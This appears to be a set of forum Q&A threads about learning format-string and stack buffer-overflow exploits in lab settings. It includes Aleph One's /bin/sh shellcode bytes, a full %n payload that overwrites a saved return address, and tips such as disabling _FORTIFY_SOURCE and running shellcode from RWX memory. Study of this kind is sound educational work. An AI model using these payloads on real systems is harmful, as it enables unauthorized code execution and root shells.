I'm running this in an environment with stack randomization disabled, and using the gcc version compatible with AlephOne's buffer overflow - that works great!
I'm trying to overwrite the instruction pointer register (eip) with the address of the array containing my shellcode. I always end up with segmentation fault though. The following is a snippet I'm trying to exploit:
//Prints version
static
void print_version(char* cmd)
{
char txt[640+1];
snprintf(txt, 640, "Submission program version 0.1 (%s)\n", cmd);
printf(txt);
}
I'm calling this function through execve(). The format string is the argv[0] here, which is successfully passed to the function above.
I'm having this format string:
\x0c\xdc\xbf\xffjunk\x0d\xdc\xbf\xffjunk\x0e\xdc\xbf\xffjunk\x0f\xdc\xbf\xff%8x%8x%120x%n%5x%n%230x%n%64x%n
followed by 200 NOPs, shellcode and remaining array with the NOPs as well.
The shellcode is Aleph One's code:
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
Going back to the format string, I'm overwriting 4 addresses 0xffbfdc0c to 0xffbfdc0f. 0xffbfdc0c is the saved eip address I found by setting a break point on print_version() function mentioned at the top.
I'm trying to replace it with the address 0xffbfdcd4, which is 150 bytes above the base address for txt[] array in print_version (counting the initial characters of the txt[] in the function and format string after that, hoping it may land somewhere in the NOPs preceding the shellcode).
I just end up with a SEG fault. I'm not sure how to proceed further or how I should debug to see if it's actually overwriting the value at the intended address.
EDIT: Am I using the correct format string?
Could anyone also tell me how to check the address using gdb after my program has generated a segmentation fault, or right before the fault but after the address has been changed?
Thanks.
A few things: you state that your format string is argv[0]. Are you sure you didn't mean argv[1]? argv[0] is typically reserved for the program name, argv[1] being the first argument to the program.
You can examine the address after the write by setting one breakpoint before the write occurs and another immediately after it, and then using x/x 0xffbfdc0c to see whether you're writing to the correct location. The GDB manual (available online) may be helpful to you as well.
The neat thing about format string writes is that you're not limited in where you can write, so anything is fair game (hint hint). You might also want to make sure that -D_FORTIFY_SOURCE isn't being set when you compile your program.
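The padding widths in a byte-at-a-time %n string like the one in the question can be checked with a little arithmetic. The following is only a sketch under stated assumptions: pad_for_byte and its parameters are hypothetical names, the target is little-endian x86, and each %n is aimed one address higher than the previous one, so only the low 8 bits of the running character count matter for each write.

```c
#include <stddef.h>

/*
 * Hypothetical helper: how many characters must still be printed so that
 * the running count, taken modulo 256, equals target_byte.
 * printed    - characters output so far
 * min_width  - smallest usable field width (e.g. 8 for a %8x conversion)
 */
unsigned pad_for_byte(unsigned printed, unsigned target_byte, unsigned min_width)
{
    /* Unsigned subtraction wraps, so masking yields the distance mod 256. */
    unsigned pad = (target_byte - printed) & 0xffu;

    /* A width that is too small can always be bumped by a full 256. */
    while (pad < min_width)
        pad += 256;

    return pad;
}
```

For the target 0xffbfdcd4 the bytes from lowest to highest address are 0xd4, 0xdc, 0xbf and 0xff. Starting from a count of 0 and feeding each result back in, the pads come out as 212, 8, 227 and 64. In a real string the first pad has to be reduced by however many characters were already printed before the first %n.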
I have two questions related to C programming and shellcoding (assembly) following below.
Question 1: Can anyone provide an answer on why putting two shellcodes in one program wouldn't work? I know it's related to the memory region but I need to know the exact reason. Program is compiled using gcc with the -zexecstack and -fno-stack-protector options.
#include <stdio.h>
#include <string.h>
main(int argc, char *argv[])
{
unsigned char shellcode[] = "\x01\x02<SHELLCODE>";
/* if the line below is uncommented, it will result in a segfault */
/* unsigned char shellcode_[] = "\x01\x02<SHELLCODE>"; */
int (*ret)() = (int(*)())shellcode;
return 0;
}
So how would it be possible to divide multiple shellcodes into different memory regions and call them without them interrupting the execution flow between each other, and decide which one to call? (I mean just STORE two shellcodes, not RUN them simultaneously, if that's possible at all).
Question 2: if the shellcode has to be passed as a parameter to a function, what would be the proper way to do it?
Pseudocode:
unsigned char shellcode[] = "\x01\x02...";
void call_shellcode(unsigned char shellcode[200]);
main()
{
call_shellcode(shellcode);
}
void call_shellcode(unsigned char shellcode[200])
{
... print/call shellcode
}
UPDATE: As there seems to be some misunderstanding of the question, this is not the ACTUAL shellcode. I do know what shellcode is, how it is generated, and how it works. I have not provided actual shellcode within the C stub in order to keep it readable. The value "\x01\x02" is a placeholder that illustrates the idea of the question and NOT any actual contents.
Your shellcode cannot possibly work for a very simple reason: it begins with \x01\x02:
unsigned char shellcode[] = "\x01\x02<SHELLCODE>";
I'm not sure why you think your shellcode has to begin with those two bytes: it really doesn't!
Those two bytes decode to add DWORD PTR [rdx],eax (or edx if running in 32-bit mode). Since you do not have any control over the value of RDX/EDX at the time your shellcode is called, it will very likely immediately cause a segmentation fault because RDX/EDX does not contain a valid (and writable) memory address.
Changing literally anything around the shellcode, inside the function or outside it, could lead the compiler to choose a different register allocation that leaves RDX/EDX holding a valid address at runtime, so the code no longer crashes, but that would just be a lucky coincidence. Writing and using shellcode like this is inherently undefined behavior, or at best implementation-defined (for a fixed operating system and compiler), so extra care must be taken.
So how would it be possible to divide multiple shellcodes into different memory regions and call them without them interrupting the execution flow between each other, and decide which one to call?
Well, you're not really dividing anything in "different memory regions"... whether you use one array or two or ten, they are all declared on the stack and they will be close together on the stack.
If you want to jump from one to the other, that's going to be a complex task, because in general you do not know the location of a variable on the stack beforehand, so you will have to do some math calculating your current location and then the offset from one shellcode chunk to the other, ultimately performing a relative call/jump.
If shellcode has to be passed as a parameter to a function what would be the proper way to do this?
The proper way is to mmap a region of memory that is RWX, write the shellcode into it (memcpy, read from stdin, etc.) and then pass a pointer to that memory region to the function you want. You have no guarantee that a piece of global data will be put by the compiler in an executable memory region. In fact, no modern day compiler would do that, and furthermore, no modern day kernel would map such a region as executable even if the ELF is compiled with -z execstack.
In recent kernels -z execstack is only respected for the stack itself, so passing a shellcode as function argument through a variable will only work if the variable was defined on the stack.
You can't have two variables with the same name in the same scope (this part has nothing to do with what the variables are or how they are used). Simply give the second shellcode a different name.
Note I am not going to comment at all on what you are trying to do, other than that I would not think of manually created machine code as "shell code" (which I would usually think of as code intended for a command shell like bash).
I have exploitable c code which takes user input. I am able to print out contents of the stack using %10$p which prints out the 10th value stored on the stack. However when I try to run the same program but with %10$n it segfaults. Which does not make sense. Segfaults means I am trying to access memory that does not belong to me. However, this memory does 'belong to me' since I can print it out. Why does this happen?
Unfortunately, I cannot post the code for it because it is for an assignment, so I have to keep this question abstract.
%10$n means write the number of characters printed to the address pointed to by the 10th element on the stack, not the actual 10th element of the stack. This means that if the 10th element doesn't point to valid, writable memory, which it likely doesn't, then you will segfault upon trying to write to it.
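The difference is easiest to see in a well-formed call, where the argument that matches %n really is a pointer to an int. A minimal sketch (chars_before_n is a hypothetical name, and the format string is a literal rather than user input):

```c
#include <stdio.h>

/*
 * Hypothetical demo: %n stores the number of characters produced so far
 * into the int that the matching argument POINTS TO.
 */
int chars_before_n(void)
{
    char out[32];
    int written = -1;

    /* "AAAA" is four characters, so %n stores 4 through &written. */
    snprintf(out, sizeof out, "AAAA%n", &written);

    return written;
}
```

Calling chars_before_n() returns 4. In the exploitable program nothing guarantees that the 10th stack slot holds such a pointer, which is why %10$p succeeds (it only reads the slot) while %10$n crashes (it writes through whatever value the slot contains).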
I have these two programs just to understand how pointers work. The first one is named test.c and here is the code.
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
int *mem = malloc(sizeof(int) * 1);
*mem = 90;
//free(mem);
printf("%p", mem);
return (0);
}
So basically what I have is a program that allocates space for one integer and then prints that address to standard output. In the commented-out line I free the allocated memory after assigning a value; I will explain why I commented it out later. My second program is in a file called test1.c, and here is the code:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
int num = (int)strtol(argv[1], NULL, 16);
int *mem = (void *)(long)num;
printf("at test1 string> %s, changed to pointer-->%p, after being dereferenced-->%i\n",argv[1], mem, *mem);
return (0);
}
In this second program, an input is taken from the command line and then it is changed to a pointer (an address). It assumes what is passed is a hex string. What it does, is just to print the memory address passed and then try to get the value at that address.
What I did next was compile the files to test and test1 respectively using gcc (I am using Linux) and run the command ./test | xargs ./test1, which gives me the following error: xargs: ./test1: terminated by signal 11. I understand that this is a segmentation fault raised by test1, because if I don't dereference the pointer I don't get this error. But I don't understand why I am getting a segfault. Even after I free the memory (uncomment the commented line in the first program) I still get a segmentation fault. I was expecting to get some garbage value rather than a segfault. I am just getting started with this whole process and pointer thing, so there is surely something I am missing; I hope someone will explain or direct me to a resource.
To rephrase my question: how can a program access a specific memory address without allocating it?
You can't.
Memory addresses are divided into pages (usually 4096 bytes). When you access an address, the CPU looks up the page containing that address in the process's "page table". This table says where in physical memory (i.e. "which RAM chip") that address is.
So you cannot access addresses that aren't in your process's page table. Full stop.
How do you get pages added to your page table? You ask the OS. On Windows the function is called VirtualAlloc. On Linux it's called mmap. Or, you use a function like malloc, which lets you allocate only a small part of a page (by splitting up the pages it gets from the OS).
Also, every process has a different page table. So the addresses mean different things in different processes. Maybe the test process could have a page table entry for page 0x12345000, but the test1 process doesn't, because they're completely different tables. This is why it doesn't make sense to send pointers from one process to another.
In the old days of computing, there were no page tables and pointers were actual RAM addresses, but those days are long gone.
Edit: You can also ask the OS to put the same page in two different processes' page tables at the same time - this is called shared memory.
So if I understand what you are doing, you're printing the address of a dynamically allocated block of memory from one program, cutting and pasting that as input to a second program, which then tries to access that address.
There are several reasons why this won't work.
First is what user253751 points out - addresses don't map across different processes. 0x1234 in process A maps to a different physical memory cell than 0x1234 in process B. There are ways of setting up shared memory between running processes, but it's a bit more work than this.
Secondly, you're using the wrong types. On a typical 64-bit system an int is not large enough to store a pointer value, so after casting and assigning the result of strtol to num you've most likely lost the upper bits, and casting that back to a pointer won't get you the right address.
The types intptr_t and uintptr_t in stdint.h are integer types large enough to store pointer values, but their implementation is optional, and it's still not a sure bet that strtol can accurately convert the input value.
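A conversion that at least preserves every bit of the address could be sketched as below. This assumes the input is the hexadecimal text printed by %p on a glibc-style system; parse_address is a hypothetical name. It fixes only the type problem: dereferencing the result in a different process still fails for the reason given in the first point.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/*
 * Hypothetical helper: parse a hexadecimal address (with or without a
 * leading "0x") into a uintptr_t. Returns 0 on malformed or
 * out-of-range input.
 */
uintptr_t parse_address(const char *hex)
{
    char *end = NULL;

    errno = 0;
    unsigned long long value = strtoull(hex, &end, 16);

    /* Reject empty input, trailing junk, and values that do not fit. */
    if (errno != 0 || end == hex || *end != '\0' || value > UINTPTR_MAX)
        return 0;

    return (uintptr_t)value;
}
```

In test1.c this would replace the strtol/int pair, for example uintptr_t num = parse_address(argv[1]); followed by int *mem = (int *)num;.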
While user253751 has given a good technical explanation, I want to put it in more beginner-friendly terms:
Your OS makes sure one process cannot access the memory of another one as this would mean that you could manipulate or destroy other programs or steal their data (passwords, for example).
The C language does not check pointers, so you can set them to whatever you want, but if you want to access this address, the OS is stopping you because it has security features.
I'm learning various exploits and I can't quite get my head around Format String exploits. I've got a fairly simple program set up in an environment that allows the exploit.
int woah(char *arg){
char buf[200];
snprintf(buf, sizeof buf, arg);
return 0;
}
I'm able to control the arg being passed into the function, which is how the attack will happen, with the end result of the program running my shellcode and giving me root. Making the program crash is easy: just feed it "%s%s" and it segfaults. We want to do more than that, so we feed it something like "AAAA%x%x%x%x%x%x%x". Looking at the buffer in gdb right after the snprintf, we can see:
"AAAA849541414141353934....blah blah blah"
That's good! We can see the A's on the stack as well as the 41s, which is A in hex. But then what comes next? I get that the general idea here is to overwrite the instruction pointer with four bytes by having the address at the start of the string that we feed in, and then somewhere along the line we have it pointing to our shellcode.
How would I find the address of the seip/return address to overwrite?
When snprintf() is called, a stack frame (a region of stack memory) is created for the call. Before that happens, the call instruction pushes the return address, the point in the caller where execution should resume, onto the stack. This address sits in the stack frame, so when the function finishes and its frame is unwound, execution jumps back to that address and the program continues. What you are trying to do is overwrite this saved address with the address of your shellcode. Research stack frames, ESP, EBP and EIP further to get the idea.
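That the return address is ordinary data stored for each call can be observed from C itself. The sketch below relies on __builtin_return_address, a GCC/Clang extension rather than standard C, and where_will_i_return is a hypothetical name. It reports the value of the saved address, not its location on the stack; in gdb, the info frame command lists where the saved registers, including eip, are stored for the selected frame.

```c
#include <stddef.h>

/*
 * Hypothetical demo: returns the address this call will return to,
 * i.e. the value the call instruction saved on the stack.
 * noinline keeps the compiler from folding the call away.
 */
__attribute__((noinline)) void *where_will_i_return(void)
{
    return __builtin_return_address(0);
}
```

Printing the result with %p from two different call sites gives two different addresses, each pointing just past the corresponding call instruction.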
This question is about the exploit for the program notesearch on pg 121 of the book Hacking: Art of Exploitation 2nd Edition.
There is something I do not understand in the exploit:
When the System executes the ./notesearch 'xyz....' the argument
'xyz...' overflows the string buffer in the child program thereby
overwriting the return address....that much is clear.
The assumption here is that the notesearch program's stack frame comes on top of the calling exploit's stack frame. This holds true when the compiled versions exist on the same system.
My first question is 1. Will this work even as a remote hack?
My second question is
2. Since the buffer has been used to overwrite all variables including and beyond the return address, how does the notesearch program work as intended?
Variables like "printing" etc which sit in this stackframe and decide whether messages are printed or not all seem to work fine.
Even though the calling functions sit on top of the relevant stack frame, where the string buffer that is being flooded sits, there are certain key variables which would have been overwritten.
Question no. 3.
Given that String buffer is part of a new stack frame pushed in after execution of notesearch starts, the buffer overwrites all the given variables in that notesearch program. Also the buffer is the value for the search string. By the program logic since the search string does not match with message, the program should not output details of the User messages. In this case, the messages appear. I want to know why?
(For reference: the book is http://www.tinker.tv/download/hacking2_sample.pdf and the code is downloadable for free from http://www.nostarch.com/hacking2.htm.)
Keep reading the book; another example is given on page 122, and then there's plenty of explanatory text that tells all about the exploits.
Here's the relevant part of notesearch's code:
int main(int argc, char *argv[]) {
int userid, printing=1, fd; // file descriptor
char searchstring[100];
if(argc > 1) // If there is an arg
strcpy(searchstring, argv[1]); // that is the search string
else // otherwise
searchstring[0] = 0; // search string is empty
userid = getuid();
fd = open(FILENAME, O_RDONLY); // open the file for read-only access
You wrote:
The assumption here is that the notesearch program's stack frame comes ontop of the calling exploit's Stack frame.
No, that's wrong. There is only one stack frame that's relevant here: the stack frame of the main() function in notesearch. The fact that we invoke ./notesearch xyz... via a system() call inside exploit_notesearch is irrelevant; we could just as well invoke ./notesearch xyz... directly on the bash command line, or trick some other process (such as, you know, bash) into executing it on our behalf.
Will this work even as a remote hack?
Of course.
Since the buffer has been used to overwrite all variables including and beyond the return address, how does the notesearch program work as intended?
Well, it doesn't really work as intended. Look at the output again:
reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#
Giving you a shell clearly doesn't count as "working as intended". But even before that, the program claims to find notes for userid 999 in /var/notes, which might indicate that it's a little bit confused. In our role as the malicious hacker, we don't care about this garbage output from the notesearch program; all we care about is that it eventually reaches the end of main() and returns to our shellcode, giving us access to the shell.
But, if you're wondering how we managed to overwrite the return address without overwriting local variables userid, printing, and fd, there are at least three obvious possibilities:
A. Maybe those variables are allocated below searchstring on the stack.
B. Maybe those variables are allocated in registers instead of on the stack.
C. Overwhelmingly likely, those variables are being overwritten, but their initial values simply don't matter to the program. For example, userid can get any value at all, because that garbage value will immediately be overwritten with getuid() on the next line. The only variable whose initial value matters is printing. And even printing changes the behavior of the program only if it happens to get the value 0 — and it can't get the value 0, because the data we're copying in consists entirely of non-zero bytes, by design.
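Possibility C can be illustrated without touching a real stack. The sketch below models the two locals as a struct so the copy stays well-defined; struct fake_frame and printing_after_copy are hypothetical names, and the layout (printing placed directly after searchstring) is an assumption, not something the compiler guarantees for actual local variables.

```c
#include <stddef.h>
#include <string.h>

/* Assumed layout: the flag sits right after the 100-byte buffer. */
struct fake_frame {
    char searchstring[100];
    int printing;
};

/*
 * Hypothetical demo: copy payload_len bytes of 0x41 ('A') over the
 * frame and report what ends up in `printing`.
 */
int printing_after_copy(size_t payload_len)
{
    struct fake_frame frame;
    unsigned char payload[sizeof frame];

    memset(&frame, 0, sizeof frame);
    frame.printing = 1;

    /* Clamp so the copy never leaves the struct. */
    if (payload_len > sizeof payload)
        payload_len = sizeof payload;

    memset(payload, 0x41, sizeof payload);
    memcpy(&frame, payload, payload_len);

    return frame.printing;
}
```

A 50-byte payload leaves printing at 1. A payload that covers the whole struct replaces it with a value built from 0x41 bytes, which is garbage but still non-zero, so a test such as if(printing) behaves exactly as before.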
I think you don't really understand what a buffer overflow is. The searchstring variable is allocated 100 bytes on the stack. Now you are copying a larger chunk of data into searchstring without checking its length. The data therefore overflows into other parts of the stack frame of notesearch's main function, and the return address is overwritten as well. That's how it works.
I think that the most important assumption here is that the notesearch stack is similar to that of exploit_notesearch. That is why he uses an exploit_notesearch local variable (unsigned int i) to calculate ret. He assumes (of course, knowing the source code of notesearch) that when both programs are loaded in memory they will have similar frame addresses (around 0xffff7..)
Of course, the two programs do not share memory; they are different processes.